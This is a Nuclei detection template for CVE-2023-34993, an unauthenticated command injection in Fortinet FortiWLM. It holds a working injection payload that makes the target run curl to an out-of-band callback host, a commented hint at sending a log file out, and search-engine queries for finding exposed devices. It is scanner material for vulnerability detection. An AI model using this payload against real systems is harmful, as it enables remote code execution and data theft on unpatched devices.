nuclei-templates/http/cves/2023/CVE-2023-34993.yaml

59 lines
2.1 KiB
YAML
Raw Permalink Normal View History

id: CVE-2023-34993
info:
name: Fortinet FortiWLM Unauthenticated Command Injection Vulnerability
author: dwisiswant0
severity: critical
description: |
A improper neutralization of special elements used in an os command ('os
command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and
8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands
Successful exploitation of this vulnerability could allow an attacker to
bypass authentication and gain unauthorized access to the affected system.
remediation: |
For FortiWLM version 8.6.0 through 8.6.5 upgrade to version >= 8.6.6.
For FortiWLM version 8.5.0 through 8.5.4 upgrade to version >= 8.5.5.
reference:
- https://fortiguard.com/psirt/FG-IR-23-140
- https://www.horizon3.ai/attack-research/attack-blogs/fortiwlm-the-almost-story-for-the-forti-forty/
2024-05-31 19:23:20 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-34993
cwe-id: CWE-78
epss-score: 0.96644
epss-percentile: 0.99631
cpe: cpe:2.3:a:fortinet:fortiwlm:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: fortinet
product: fortiwlm
shodan-query:
- http.title:"FortiWLM"
- http.html:"fortiwlm"
- http.title:"fortiwlm"
fofa-query:
- body="fortiwlm"
- title="fortiwlm"
2024-05-31 19:23:20 +00:00
google-query: intitle:"fortiwlm"
tags: cve,cve2023,fortinet,fortiwlm,rce,unauth
variables:
progressfile: '{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log"
http:
- method: GET
path:
- "{{BaseURL}}/ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=deleteprogressfile&progressfile={{url_encode(progressfile)}}"
2024-03-30 03:55:16 +00:00
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: curl"
# digest: 490a0046304402205a332f7b02191f50bbdffc0c070e03f669898fd78fd7b47176911f36a6231f5702203ad403ffd2de74ac672ebe4c762a1c1b56bb9ab395485fa85fade4d08e0e046b:922c64590222798bb761d5b6d8e72950